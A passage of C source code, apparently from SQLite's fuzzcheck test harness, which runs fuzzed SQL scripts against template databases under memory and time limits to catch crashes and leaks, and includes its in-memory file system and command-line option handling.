printf("SQL-ERROR: (%d) %s\n", rc, sqlite3_errmsg(db)); fflush(stdout); } }else if( eVerbosity>=4 ){ printf("SQL-ERROR (%d): %s\n", rc, sqlite3_errmsg(db)); fflush(stdout); } /* End if( SQLITE_OK ) */ return sqlite3_finalize(pStmt); } /* Invoke this routine to run a single test case */ int runCombinedDbSqlInput( const uint8_t *aData, /* Combined DB+SQL content */ size_t nByte, /* Size of aData in bytes */ int iTimeout, /* Use this timeout */ int bScript, /* If true, just render CLI output */ int iSqlId /* SQL identifier */ ){ int rc; /* SQLite API return value */ int iSql; /* Index in aData[] of start of SQL */ unsigned char *aDb = 0; /* Decoded database content */ int nDb = 0; /* Size of the decoded database */ int i; /* Loop counter */ int j; /* Start of current SQL statement */ char *zSql = 0; /* SQL text to run */ int nSql; /* Bytes of SQL text */ FuzzCtx cx; /* Fuzzing context */ if( nByte<10 ) return 0; if( sqlite3_initialize() ) return 0; if( sqlite3_memory_used()!=0 ){ int nAlloc = 0; int nNotUsed = 0; sqlite3_status(SQLITE_STATUS_MALLOC_COUNT, &nAlloc, &nNotUsed, 0); fprintf(stderr,"memory leak prior to test start:" " %lld bytes in %d allocations\n", sqlite3_memory_used(), nAlloc); exit(1); } memset(&cx, 0, sizeof(cx)); iSql = decodeDatabase((unsigned char*)aData, (int)nByte, &aDb, &nDb); if( iSql<0 ) return 0; nSql = (int)(nByte - iSql); if( bScript ){ char zName[100]; sqlite3_snprintf(sizeof(zName),zName,"dbsql%06d.db",iSqlId); renderDbSqlForCLI(stdout, zName, aDb, nDb, (unsigned char*)(aData+iSql), nSql); sqlite3_free(aDb); return 0; } if( eVerbosity>=3 ){ printf( "****** %d-byte input, %d-byte database, %d-byte script " "******\n", (int)nByte, nDb, nSql); fflush(stdout); } rc = sqlite3_open(0, &cx.db); if( rc ){ sqlite3_free(aDb); return 1; } if( bVdbeDebug ){ sqlite3_exec(cx.db, "PRAGMA vdbe_debug=ON", 0, 0, 0); } /* Invoke the progress handler frequently to check to see if we ** are taking too long. The progress handler will return true ** (which will block further processing) if more than giTimeout seconds have ** elapsed since the start of the test. */ cx.iLastCb = timeOfDay(); cx.iCutoffTime = cx.iLastCb + (iTimeout<giTimeout ? iTimeout : giTimeout); cx.mxCb = mxProgressCb; #ifndef SQLITE_OMIT_PROGRESS_CALLBACK sqlite3_progress_handler(cx.db, 10, progress_handler, (void*)&cx); #endif /* Set a limit on the maximum size of a prepared statement, and the ** maximum length of a string or blob */ if( vdbeOpLimit>0 ){ sqlite3_limit(cx.db, SQLITE_LIMIT_VDBE_OP, vdbeOpLimit); } if( lengthLimit>0 ){ sqlite3_limit(cx.db, SQLITE_LIMIT_LENGTH, lengthLimit); } if( depthLimit>0 ){ sqlite3_limit(cx.db, SQLITE_LIMIT_EXPR_DEPTH, depthLimit); } sqlite3_limit(cx.db, SQLITE_LIMIT_LIKE_PATTERN_LENGTH, 100); sqlite3_hard_heap_limit64(heapLimit); if( nDb>=20 && aDb[18]==2 && aDb[19]==2 ){ aDb[18] = aDb[19] = 1; } rc = sqlite3_deserialize(cx.db, "main", aDb, nDb, nDb, SQLITE_DESERIALIZE_RESIZEABLE | SQLITE_DESERIALIZE_FREEONCLOSE); if( rc ){ fprintf(stderr, "sqlite3_deserialize() failed with %d\n", rc); goto testrun_finished; } if( maxDbSize>0 ){ sqlite3_int64 x = maxDbSize; sqlite3_file_control(cx.db, "main", SQLITE_FCNTL_SIZE_LIMIT, &x); } /* For high debugging levels, turn on debug mode */ if( eVerbosity>=5 ){ sqlite3_exec(cx.db, "PRAGMA vdbe_debug=ON;", 0, 0, 0); } /* Block debug pragmas and ATTACH/DETACH. But wait until after ** deserialize to do this because deserialize depends on ATTACH */ sqlite3_set_authorizer(cx.db, block_troublesome_sql, 0); #ifdef VT02_SOURCES sqlite3_vt02_init(cx.db, 0, 0); #endif /* Consistent PRNG seed */ #ifdef SQLITE_TESTCTRL_PRNG_SEED sqlite3_table_column_metadata(cx.db, 0, "x", 0, 0, 0, 0, 0, 0); sqlite3_test_control(SQLITE_TESTCTRL_PRNG_SEED, 1, cx.db); #else sqlite3_randomness(0,0); #endif zSql = sqlite3_malloc( nSql + 1 ); if( zSql==0 ){ fprintf(stderr, "Out of memory!\n"); }else{ memcpy(zSql, aData+iSql, nSql); zSql[nSql] = 0; for(i=j=0; zSql[i]; i++){ if( zSql[i]==';' ){ char cSaved = zSql[i+1]; zSql[i+1] = 0; if( sqlite3_complete(zSql+j) ){ rc = runDbSql(cx.db, zSql+j); j = i+1; } zSql[i+1] = cSaved; if( rc==SQLITE_INTERRUPT || progress_handler(&cx) ){ goto testrun_finished; } } } if( j<i ){ runDbSql(cx.db, zSql+j); } } testrun_finished: sqlite3_free(zSql); rc = sqlite3_close(cx.db); if( rc!=SQLITE_OK ){ fprintf(stdout, "sqlite3_close() returns %d\n", rc); } if( eVerbosity>=2 && !bScript ){ fprintf(stdout, "Peak memory usages: %f MB\n", sqlite3_memory_highwater(1) / 1000000.0); } if( sqlite3_memory_used()!=0 ){ int nAlloc = 0; int nNotUsed = 0; sqlite3_status(SQLITE_STATUS_MALLOC_COUNT, &nAlloc, &nNotUsed, 0); fprintf(stderr,"Memory leak: %lld bytes in %d allocations\n", sqlite3_memory_used(), nAlloc); exit(1); } sqlite3_hard_heap_limit64(0); sqlite3_soft_heap_limit64(0); return 0; } /* ** END of the dbsqlfuzz code ***************************************************************************/ /* Look at a SQL text and try to determine if it begins with a database ** description, such as would be found in a dbsqlfuzz test case. Return ** true if this does appear to be a dbsqlfuzz test case and false otherwise. */ static int isDbSql(unsigned char *a, int n){ unsigned char buf[12]; int i; if( n>4 && memcmp(a,"\n--\n",4)==0 ) return 1; while( n>0 && isspace(a[0]) ){ a++; n--; } for(i=0; n>0 && i<8; n--, a++){ if( isxdigit(a[0]) ) buf[i++] = a[0]; } if( i==8 && memcmp(buf,"53514c69",8)==0 ) return 1; return 0; } /* Implementation of the isdbsql(TEXT) SQL function. */ static void isDbSqlFunc( sqlite3_context *context, int argc, sqlite3_value **argv ){ int n = sqlite3_value_bytes(argv[0]); unsigned char *a = (unsigned char*)sqlite3_value_blob(argv[0]); sqlite3_result_int(context, a!=0 && n>0 && isDbSql(a,n)); } /* Methods for the VHandle object */ static int inmemClose(sqlite3_file *pFile){ VHandle *p = (VHandle*)pFile; VFile *pVFile = p->pVFile; pVFile->nRef--; if( pVFile->nRef==0 && pVFile->zFilename==0 ){ pVFile->sz = -1; free(pVFile->a); pVFile->a = 0; } return SQLITE_OK; } static int inmemRead( sqlite3_file *pFile, /* Read from this open file */ void *pData, /* Store content in this buffer */ int iAmt, /* Bytes of content */ sqlite3_int64 iOfst /* Start reading here */ ){ VHandle *pHandle = (VHandle*)pFile; VFile *pVFile = pHandle->pVFile; if( iOfst<0 || iOfst>=pVFile->sz ){ memset(pData, 0, iAmt); return SQLITE_IOERR_SHORT_READ; } if( iOfst+iAmt>pVFile->sz ){ memset(pData, 0, iAmt); iAmt = (int)(pVFile->sz - iOfst); memcpy(pData, pVFile->a + iOfst, iAmt); return SQLITE_IOERR_SHORT_READ; } memcpy(pData, pVFile->a + iOfst, iAmt); return SQLITE_OK; } static int inmemWrite( sqlite3_file *pFile, /* Write to this file */ const void *pData, /* Content to write */ int iAmt, /* bytes to write */ sqlite3_int64 iOfst /* Start writing here */ ){ VHandle *pHandle = (VHandle*)pFile; VFile *pVFile = pHandle->pVFile; if( iOfst+iAmt > pVFile->sz ){ if( iOfst+iAmt >= MX_FILE_SZ ){ return SQLITE_FULL; } pVFile->a = safe_realloc(pVFile->a, (int)(iOfst+iAmt)); if( iOfst > pVFile->sz ){ memset(pVFile->a + pVFile->sz, 0, (int)(iOfst - pVFile->sz)); } pVFile->sz = (int)(iOfst + iAmt); } memcpy(pVFile->a + iOfst, pData, iAmt); return SQLITE_OK; } static int inmemTruncate(sqlite3_file *pFile, sqlite3_int64 iSize){ VHandle *pHandle = (VHandle*)pFile; VFile *pVFile = pHandle->pVFile; if( pVFile->sz>iSize && iSize>=0 ) pVFile->sz = (int)iSize; return SQLITE_OK; } static int inmemSync(sqlite3_file *pFile, int flags){ return SQLITE_OK; } static int inmemFileSize(sqlite3_file *pFile, sqlite3_int64 *pSize){ *pSize = ((VHandle*)pFile)->pVFile->sz; return SQLITE_OK; } static int inmemLock(sqlite3_file *pFile, int type){ return SQLITE_OK; } static int inmemUnlock(sqlite3_file *pFile, int type){ return SQLITE_OK; } static int inmemCheckReservedLock(sqlite3_file *pFile, int *pOut){ *pOut = 0; return SQLITE_OK; } static int inmemFileControl(sqlite3_file *pFile, int op, void *pArg){ return SQLITE_NOTFOUND; } static int inmemSectorSize(sqlite3_file *pFile){ return 512; } static int inmemDeviceCharacteristics(sqlite3_file *pFile){ return SQLITE_IOCAP_SAFE_APPEND | SQLITE_IOCAP_UNDELETABLE_WHEN_OPEN | SQLITE_IOCAP_POWERSAFE_OVERWRITE; } /* Method table for VHandle */ static sqlite3_io_methods VHandleMethods = { /* iVersion */ 1, /* xClose */ inmemClose, /* xRead */ inmemRead, /* xWrite */ inmemWrite, /* xTruncate */ inmemTruncate, /* xSync */ inmemSync, /* xFileSize */ inmemFileSize, /* xLock */ inmemLock, /* xUnlock */ inmemUnlock, /* xCheck... */ inmemCheckReservedLock, /* xFileCtrl */ inmemFileControl, /* xSectorSz */ inmemSectorSize, /* xDevchar */ inmemDeviceCharacteristics, /* xShmMap */ 0, /* xShmLock */ 0, /* xShmBarrier */ 0, /* xShmUnmap */ 0, /* xFetch */ 0, /* xUnfetch */ 0 }; /* ** Open a new file in the inmem VFS. All files are anonymous and are ** delete-on-close. */ static int inmemOpen( sqlite3_vfs *pVfs, const char *zFilename, sqlite3_file *pFile, int openFlags, int *pOutFlags ){ VFile *pVFile = createVFile(zFilename, 0, (unsigned char*)""); VHandle *pHandle = (VHandle*)pFile; if( pVFile==0 ){ return SQLITE_FULL; } pHandle->pVFile = pVFile; pVFile->nRef++; pFile->pMethods = &VHandleMethods; if( pOutFlags ) *pOutFlags = openFlags; return SQLITE_OK; } /* ** Delete a file by name */ static int inmemDelete( sqlite3_vfs *pVfs, const char *zFilename, int syncdir ){ VFile *pVFile = findVFile(zFilename); if( pVFile==0 ) return SQLITE_OK; if( pVFile->nRef==0 ){ free(pVFile->zFilename); pVFile->zFilename = 0; pVFile->sz = -1; free(pVFile->a); pVFile->a = 0; return SQLITE_OK; } return SQLITE_IOERR_DELETE; } /* Check for the existance of a file */ static int inmemAccess( sqlite3_vfs *pVfs, const char *zFilename, int flags, int *pResOut ){ VFile *pVFile = findVFile(zFilename); *pResOut = pVFile!=0; return SQLITE_OK; } /* Get the canonical pathname for a file */ static int inmemFullPathname( sqlite3_vfs *pVfs, const char *zFilename, int nOut, char *zOut ){ sqlite3_snprintf(nOut, zOut, "%s", zFilename); return SQLITE_OK; } /* Always use the same random see, for repeatability. */ static int inmemRandomness(sqlite3_vfs *NotUsed, int nBuf, char *zBuf){ memset(zBuf, 0, nBuf); memcpy(zBuf, &g.uRandom, nBuf<sizeof(g.uRandom) ? nBuf : sizeof(g.uRandom)); return nBuf; } /* ** Register the VFS that reads from the g.aFile[] set of files. */ static void inmemVfsRegister(int makeDefault){ static sqlite3_vfs inmemVfs; sqlite3_vfs *pDefault = sqlite3_vfs_find(0); inmemVfs.iVersion = 3; inmemVfs.szOsFile = sizeof(VHandle); inmemVfs.mxPathname = 200; inmemVfs.zName = "inmem"; inmemVfs.xOpen = inmemOpen; inmemVfs.xDelete = inmemDelete; inmemVfs.xAccess = inmemAccess; inmemVfs.xFullPathname = inmemFullPathname; inmemVfs.xRandomness = inmemRandomness; inmemVfs.xSleep = pDefault->xSleep; inmemVfs.xCurrentTimeInt64 = pDefault->xCurrentTimeInt64; sqlite3_vfs_register(&inmemVfs, makeDefault); }; /* ** Allowed values for the runFlags parameter to runSql() */ #define SQL_TRACE 0x0001 /* Print each SQL statement as it is prepared */ #define SQL_OUTPUT 0x0002 /* Show the SQL output */ /* ** Run multiple commands of SQL. Similar to sqlite3_exec(), but does not ** stop if an error is encountered. */ static void runSql(sqlite3 *db, const char *zSql, unsigned runFlags){ const char *zMore; sqlite3_stmt *pStmt; while( zSql && zSql[0] ){ zMore = 0; pStmt = 0; sqlite3_prepare_v2(db, zSql, -1, &pStmt, &zMore); if( zMore==zSql ) break; if( runFlags & SQL_TRACE ){ const char *z = zSql; int n; while( z<zMore && ISSPACE(z[0]) ) z++; n = (int)(zMore - z); while( n>0 && ISSPACE(z[n-1]) ) n--; if( n==0 ) break; if( pStmt==0 ){ printf("TRACE: %.*s (error: %s)\n", n, z, sqlite3_errmsg(db)); }else{ printf("TRACE: %.*s\n", n, z); } } zSql = zMore; if( pStmt ){ if( (runFlags & SQL_OUTPUT)==0 ){ while( SQLITE_ROW==sqlite3_step(pStmt) ){} }else{ int nCol = -1; while( SQLITE_ROW==sqlite3_step(pStmt) ){ int i; if( nCol<0 ){ nCol = sqlite3_column_count(pStmt); }else if( nCol>0 ){ printf("--------------------------------------------\n"); } for(i=0; i<nCol; i++){ int eType = sqlite3_column_type(pStmt,i); printf("%s = ", sqlite3_column_name(pStmt,i)); switch( eType ){ case SQLITE_NULL: { printf("NULL\n"); break; } case SQLITE_INTEGER: { printf("INT %s\n", sqlite3_column_text(pStmt,i)); break; } case SQLITE_FLOAT: { printf("FLOAT %s\n", sqlite3_column_text(pStmt,i)); break; } case SQLITE_TEXT: { printf("TEXT [%s]\n", sqlite3_column_text(pStmt,i)); break; } case SQLITE_BLOB: { printf("BLOB (%d bytes)\n", sqlite3_column_bytes(pStmt,i)); break; } } } } } sqlite3_finalize(pStmt); } } } /* ** Rebuild the database file. ** ** (1) Remove duplicate entries ** (2) Put all entries in order ** (3) Vacuum */ static void rebuild_database(sqlite3 *db, int dbSqlOnly){ int rc; char *zSql; zSql = sqlite3_mprintf( "BEGIN;\n" "CREATE TEMP TABLE dbx AS SELECT DISTINCT dbcontent FROM db;\n" "DELETE FROM db;\n" "INSERT INTO db(dbid, dbcontent) " " SELECT NULL, dbcontent FROM dbx ORDER BY 2;\n" "DROP TABLE dbx;\n" "CREATE TEMP TABLE sx AS SELECT DISTINCT sqltext FROM xsql %s;\n" "DELETE FROM xsql;\n" "INSERT INTO xsql(sqlid,sqltext) " " SELECT NULL, sqltext FROM sx ORDER BY 2;\n" "DROP TABLE sx;\n" "COMMIT;\n" "PRAGMA page_size=1024;\n" "VACUUM;\n", dbSqlOnly ? " WHERE isdbsql(sqltext)" : "" ); rc = sqlite3_exec(db, zSql, 0, 0, 0); sqlite3_free(zSql); if( rc ) fatalError("cannot rebuild: %s", sqlite3_errmsg(db)); } /* ** Return the value of a hexadecimal digit. Return -1 if the input ** is not a hex digit. */ static int hexDigitValue(char c){ if( c>='0' && c<='9' ) return c - '0'; if( c>='a' && c<='f' ) return c - 'a' + 10; if( c>='A' && c<='F' ) return c - 'A' + 10; return -1; } /* ** Interpret zArg as an integer value, possibly with suffixes. */ static int integerValue(const char *zArg){ sqlite3_int64 v = 0; static const struct { char *zSuffix; int iMult; } aMult[] = { { "KiB", 1024 }, { "MiB", 1024*1024 }, { "GiB", 1024*1024*1024 }, { "KB", 1000 }, { "MB", 1000000 }, { "GB", 1000000000 }, { "K", 1000 }, { "M", 1000000 }, { "G", 1000000000 }, }; int i; int isNeg = 0; if( zArg[0]=='-' ){ isNeg = 1; zArg++; }else if( zArg[0]=='+' ){ zArg++; } if( zArg[0]=='0' && zArg[1]=='x' ){ int x; zArg += 2; while( (x = hexDigitValue(zArg[0]))>=0 ){ v = (v<<4) + x; zArg++; } }else{ while( ISDIGIT(zArg[0]) ){ v = v*10 + zArg[0] - '0'; zArg++; } } for(i=0; i<sizeof(aMult)/sizeof(aMult[0]); i++){ if( sqlite3_stricmp(aMult[i].zSuffix, zArg)==0 ){ v *= aMult[i].iMult; break; } } if( v>0x7fffffff ) fatalError("parameter too large - max 2147483648"); return (int)(isNeg? -v : v); } /* ** Return the number of "v" characters in a string. Return 0 if there ** are any characters in the string other than "v". */ static int numberOfVChar(const char *z){ int N = 0; while( z[0] && z[0]=='v' ){ z++; N++; } return z[0]==0 ? N : 0; } /* ** Print sketchy documentation for this utility program */ static void showHelp(void){ printf("Usage: %s [options] SOURCE-DB ?ARGS...?\n", g.zArgv0); printf( "Read databases and SQL scripts from SOURCE-DB and execute each script against\n" "each database, checking for crashes and memory leaks.\n" "Options:\n" " --cell-size-check Set the PRAGMA cell_size_check=ON\n" " --dbid N Use only the database where dbid=N\n" " --export-db DIR Write databases to files(s) in DIR. Works with --dbid\n" " --export-sql DIR Write SQL to file(s) in DIR. Also works with --sqlid\n" " --help Show this help text\n" " --info Show information about SOURCE-DB w/o running tests\n" " --limit-depth N Limit expression depth to N. Default: 500\n" " --limit-heap N Limit heap memory to N. Default: 100M\n" " --limit-mem N Limit memory used by test SQLite instance to N bytes\n" " --limit-vdbe Panic if any test runs for more than 100,000 cycles\n" " --load-sql FILE.. Load SQL scripts fron files into SOURCE-DB\n" " --load-db FILE.. Load template databases from files into SOURCE_DB\n" " --load-dbsql FILE.. Load dbsqlfuzz outputs into the xsql table\n" " ^^^^------ Use \"-\" for FILE to read filenames from stdin\n" " -m TEXT Add a description to the database\n" " --native-vfs Use the native VFS for initially empty database files\n" " --native-malloc Turn off MEMSYS3/5 and Lookaside\n" " --oss-fuzz Enable OSS-FUZZ testing\n" " --prng-seed N Seed value for the PRGN inside of SQLite\n" " -q|--quiet Reduced output\n" " --rebuild Rebuild and vacuum the database file\n" " --result-trace Show the results of each SQL command\n" " --script Output CLI script instead of running tests\n" " --skip N Skip the first N test cases\n" " --spinner Use a spinner to show progress\n" " --sqlid N Use only SQL where sqlid=N\n" " --timeout N Maximum time for any one test in N millseconds\n" " -v|--verbose Increased output. Repeat for more output.\n" " --vdbe-debug Activate VDBE debugging.\n" ); } int main(int argc, char **argv){ sqlite3_int64 iBegin; /* Start time of this program */ int quietFlag = 0; /* True if --quiet or -q */ int verboseFlag = 0; /* True if --verbose or -v */ char *zInsSql = 0; /* SQL statement for --load-db or --load-sql */ int iFirstInsArg = 0; /* First argv[] for --load-db or --load-sql */ sqlite3 *db = 0; /* The open database connection */ sqlite3_stmt *pStmt; /* A prepared statement */ int rc; /* Result code from SQLite interface calls */ Blob *pSql; /* For looping over SQL scripts */ Blob *pDb; /* For looping over template databases */ int i; /* Loop index for the argv[] loop */ int dbSqlOnly = 0; /* Only use scripts that are dbsqlfuzz */ int onlySqlid = -1; /* --sqlid */ int onlyDbid = -1; /* --dbid */ int nativeFlag = 0; /* --native-vfs */ int rebuildFlag = 0; /* --rebuild */ int vdbeLimitFlag = 0; /* --limit-vdbe */ int infoFlag = 0; /* --info */ int nSkip = 0; /* --skip */ int bScript = 0; /* --script */ int bSpinner = 0; /* True for --spinner */ int timeoutTest = 0; /* undocumented --timeout-test flag */ int runFlags = 0; /* Flags sent to runSql() */ char *zMsg = 0; /* Add this message */ int nSrcDb = 0; /* Number of source databases */ char **azSrcDb = 0; /* Array of source database names */ int iSrcDb; /* Loop over all source databases */ int nTest = 0; /* Total number of tests performed */ char *zDbName = ""; /* Appreviated name of a source database */ const char *zFailCode = 0; /* Value of the TEST_FAILURE env variable */ int cellSzCkFlag = 0; /* --cell-size-check */ int sqlFuzz = 0; /* True for SQL fuzz. False for DB fuzz */ int iTimeout = 120000; /* Default 120-second timeout */ int nMem = 0; /* Memory limit override */ int nMemThisDb = 0; /* Memory limit set by the CONFIG table */ char *zExpDb = 0; /* Write Databases to files in this directory */ char *zExpSql = 0; /* Write SQL to files in this directory */ void *pHeap = 0; /* Heap for use by SQLite */ int ossFuzz = 0; /* enable OSS-FUZZ testing */ int ossFuzzThisDb = 0; /* ossFuzz value for this particular database */ int nativeMalloc = 0; /* Turn off MEMSYS3/5 and lookaside if true */ sqlite3_vfs *pDfltVfs; /* The default VFS */ int openFlags4Data; /* Flags for sqlite3_open_v2() */ int bTimer = 0; /* Show elapse time for each test */ int nV; /* How much to increase verbosity with -vvvv */ sqlite3_int64 tmStart; /* Start of each test */ sqlite3_config(SQLITE_CONFIG_URI,1); registerOomSimulator(); sqlite3_initialize(); iBegin = timeOfDay(); #ifdef __unix__ signal(SIGALRM, signalHandler); signal(SIGSEGV, signalHandler); signal(SIGABRT, signalHandler); #endif g.zArgv0 = argv[0]; openFlags4Data = SQLITE_OPEN_READONLY; zFailCode = getenv("TEST_FAILURE"); pDfltVfs = sqlite3_vfs_find(0); inmemVfsRegister(1); for(i=1; i<argc; i++){ const char *z = argv[i]; if( z[0]=='-' ){ z++; if( z[0]=='-' ) z++; if( strcmp(z,"cell-size-check")==0 ){ cellSzCkFlag = 1; }else if( strcmp(z,"dbid")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); onlyDbid = integerValue(argv[++i]); }else if( strcmp(z,"export-db")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); zExpDb = argv[++i]; }else if( strcmp(z,"export-sql")==0 || strcmp(z,"export-dbsql")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); zExpSql = argv[++i]; }else if( strcmp(z,"help")==0 ){ showHelp(); return 0; }else if( strcmp(z,"info")==0 ){ infoFlag = 1; }else if( strcmp(z,"limit-depth")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); depthLimit = integerValue(argv[++i]); }else if( strcmp(z,"limit-heap")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); heapLimit = integerValue(argv[++i]); }else if( strcmp(z,"limit-mem")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); nMem = integerValue(argv[++i]); }else if( strcmp(z,"limit-vdbe")==0 ){ vdbeLimitFlag = 1; }else if( strcmp(z,"load-sql")==0 ){ zInsSql = "INSERT INTO xsql(sqltext)" "VALUES(CAST(readtextfile(?1) AS text))"; iFirstInsArg = i+1; openFlags4Data = SQLITE_OPEN_READWRITE|SQLITE_OPEN_CREATE; break; }else if( strcmp(z,"load-db")==0 ){ zInsSql = "INSERT INTO db(dbcontent) VALUES(readfile(?1))"; iFirstInsArg = i+1; openFlags4Data = SQLITE_OPEN_READWRITE|SQLITE_OPEN_CREATE; break; }else if( strcmp(z,"load-dbsql")==0 ){ zInsSql = "INSERT INTO xsql(sqltext)" "VALUES(readfile(?1))"; iFirstInsArg = i+1; openFlags4Data = SQLITE_OPEN_READWRITE|SQLITE_OPEN_CREATE; dbSqlOnly = 1; break; }else if( strcmp(z,"m")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); zMsg = argv[++i]; openFlags4Data = SQLITE_OPEN_READWRITE|SQLITE_OPEN_CREATE; }else if( strcmp(z,"native-malloc")==0 ){ nativeMalloc = 1; }else if( strcmp(z,"native-vfs")==0 ){ nativeFlag = 1; }else if( strcmp(z,"oss-fuzz")==0 ){ ossFuzz = 1; }else if( strcmp(z,"prng-seed")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); g.uRandom = atoi(argv[++i]); }else if( strcmp(z,"quiet")==0 || strcmp(z,"q")==0 ){ quietFlag = 1; verboseFlag = 0; eVerbosity = 0; }else if( strcmp(z,"rebuild")==0 ){ rebuildFlag = 1; openFlags4Data = SQLITE_OPEN_READWRITE; }else if( strcmp(z,"result-trace")==0 ){ runFlags |= SQL_OUTPUT; }else if( strcmp(z,"script")==0 ){ bScript = 1; }else if( strcmp(z,"skip")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); nSkip = atoi(argv[++i]); }else if( strcmp(z,"spinner")==0 ){ bSpinner = 1; }else if( strcmp(z,"timer")==0 ){ bTimer = 1; }else if( strcmp(z,"sqlid")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); onlySqlid = integerValue(argv[++i]); }else if( strcmp(z,"timeout")==0 ){ if( i>=argc-1 ) fatalError("missing arguments on %s", argv[i]); iTimeout = integerValue(argv[++i]); }else if( strcmp(z,"timeout-test")==0 ){ timeoutTest = 1; #ifndef __unix__ fatalError("timeout is not available on non-unix systems"); #endif }else if( strcmp(z,"vdbe-debug")==0 ){ bVdbeDebug = 1; }else if( strcmp(z,"verbose")==0 ){ quietFlag = 0; verboseFlag++; eVerbosity++; if( verboseFlag>1 ) runFlags |= SQL_TRACE; }else if( (nV = numberOfVChar(z))>=1 ){ quietFlag = 0; verboseFlag += nV; eVerbosity += nV; if( verboseFlag>1 ) runFlags |= SQL_TRACE; }else if( strcmp(z,"version")==0 ){ int ii; const char *zz; printf("SQLite %s %s\n", sqlite3_libversion(), sqlite3_sourceid()); for(ii=0; (zz = sqlite3_compileoption_get(ii))!=0; ii++){ printf("%s\n", zz); } return 0; }else if( strcmp(z,"is-dbsql")==0 ){ i++; for(i++; i<argc; i++){ long nData; char *aData = readFile(argv[i], &nData); printf("%d %s\n", isDbSql((unsigned char*)aData,nData), argv[i]); sqlite3_free(aData); } exit(0); }else { fatalError("unknown option: %s", argv[i]); } }else{ nSrcDb++; azSrcDb = safe_realloc(azSrcDb, nSrcDb*sizeof(azSrcDb[0])); azSrcDb[nSrcDb-1] = argv[i]; } } if( nSrcDb==0 ) fatalError("no source database specified"); if( nSrcDb>1 ){ if( zMsg ){ fatalError("cannot change the description of more than one database"); } if( zInsSql ){ fatalError("cannot import into more than one database"); } } /* Process each source database separately */ for(iSrcDb=0; iSrcDb<nSrcDb; iSrcDb++){ char *zRawData = 0; long nRawData = 0; g.zDbFile = azSrcDb[iSrcDb]; rc = sqlite3_open_v2(azSrcDb[iSrcDb], &db, openFlags4Data, pDfltVfs->zName); if( rc==SQLITE_OK ){ rc = sqlite3_exec(db, "SELECT count(*) FROM sqlite_schema", 0, 0, 0); } if( rc ){ sqlite3_close(db); zRawData = readFile(azSrcDb[iSrcDb], &nRawData); if( zRawData==0 ){ fatalError("input file \"%s\" is not recognized\n", azSrcDb[iSrcDb]); } sqlite3_open(":memory:", &db); } /* Print the description, if there is one */ if( infoFlag ){ int n; zDbName = azSrcDb[iSrcDb]; i = (int)strlen(zDbName) - 1; while( i>0 && zDbName[i-1]!='/' && zDbName[i-1]!='\\' ){ i--; } zDbName += i; sqlite3_prepare_v2(db, "SELECT msg FROM readme", -1, &pStmt, 0); if( pStmt && sqlite3_step(pStmt)==SQLITE_ROW ){ printf("%s: %s", zDbName, sqlite3_column_text(pStmt,0)); }else{ printf("%s: (empty \"readme\")", zDbName); } sqlite3_finalize(pStmt); sqlite3_prepare_v2(db, "SELECT count(*) FROM db", -1, &pStmt, 0); if( pStmt && sqlite3_step(pStmt)==SQLITE_ROW && (n = sqlite3_column_int(pStmt,0))>0 ){ printf(" - %d DBs", n); } sqlite3_finalize(pStmt); sqlite3_prepare_v2(db, "SELECT count(*) FROM xsql", -1, &pStmt, 0); if( pStmt && sqlite3_step(pStmt)==SQLITE_ROW && (n = sqlite3_column_int(pStmt,0))>0 ){ printf(" - %d scripts", n); } sqlite3_finalize(pStmt); printf("\n"); sqlite3_close(db); sqlite3_free(zRawData); continue; } rc = sqlite3_exec(db, "CREATE TABLE IF NOT EXISTS db(\n" " dbid INTEGER PRIMARY KEY, -- database id\n" " dbcontent BLOB -- database disk file image\n" ");\n" "CREATE TABLE IF NOT EXISTS xsql(\n" " sqlid INTEGER PRIMARY KEY, -- SQL script id\n" " sqltext TEXT -- Text of SQL statements to run\n" ");" "CREATE TABLE IF NOT EXISTS readme(\n" " msg TEXT -- Human-readable description of this file\n" ");", 0, 0, 0); if( rc ) fatalError("cannot create schema: %s", sqlite3_errmsg(db)); if( zMsg ){ char *zSql; zSql = sqlite3_mprintf( "DELETE FROM readme; INSERT INTO readme(msg) VALUES(%Q)", zMsg); rc = sqlite3_exec(db, zSql, 0, 0, 0); sqlite3_free(zSql); if( rc ) fatalError("cannot change description: %s", sqlite3_errmsg(db)); } if( zRawData ){ zInsSql = "INSERT INTO xsql(sqltext) VALUES(?1)"; rc = sqlite3_prepare_v2(db, zInsSql, -1, &pStmt, 0); if( rc ) fatalError("cannot prepare statement [%s]: %s", zInsSql, sqlite3_errmsg(db)); sqlite3_bind_text(pStmt, 1, zRawData, nRawData, SQLITE_STATIC); sqlite3_step(pStmt); rc = sqlite3_reset(pStmt); if( rc ) fatalError("insert failed for %s", argv[i]); sqlite3_finalize(pStmt); rebuild_database(db, dbSqlOnly); zInsSql = 0; sqlite3_free(zRawData); zRawData = 0; } ossFuzzThisDb = ossFuzz; /* If the CONFIG(name,value) table exists, read db-specific settings ** from that table */ if( sqlite3_table_column_metadata(db,0,"config",0,0,0,0,0,0)==SQLITE_OK ){ rc = sqlite3_prepare_v2(db, "SELECT name, value FROM config", -1, &pStmt, 0); if( rc ) fatalError("cannot prepare query of CONFIG table: %s", sqlite3_errmsg(db)); while( SQLITE_ROW==sqlite3_step(pStmt) ){ const char *zName = (const char *)sqlite3_column_text(pStmt,0); if( zName==0 ) continue; if( strcmp(zName, "oss-fuzz")==0 ){ ossFuzzThisDb = sqlite3_column_int(pStmt,1); if( verboseFlag ) printf("Config: oss-fuzz=%d\n", ossFuzzThisDb); } if( strcmp(zName, "limit-mem")==0 ){ nMemThisDb = sqlite3_column_int(pStmt,1); if( verboseFlag ) printf("Config: limit-mem=%d\n", nMemThisDb); } } sqlite3_finalize(pStmt); } if( zInsSql ){ sqlite3_create_function(db, "readfile", 1, SQLITE_UTF8, 0, readfileFunc, 0, 0); sqlite3_create_function(db, "readtextfile", 1, SQLITE_UTF8, 0, readtextfileFunc, 0, 0); sqlite3_create_function(db, "isdbsql", 1, SQLITE_UTF8, 0, isDbSqlFunc, 0, 0); rc = sqlite3_prepare_v2(db, zInsSql, -1, 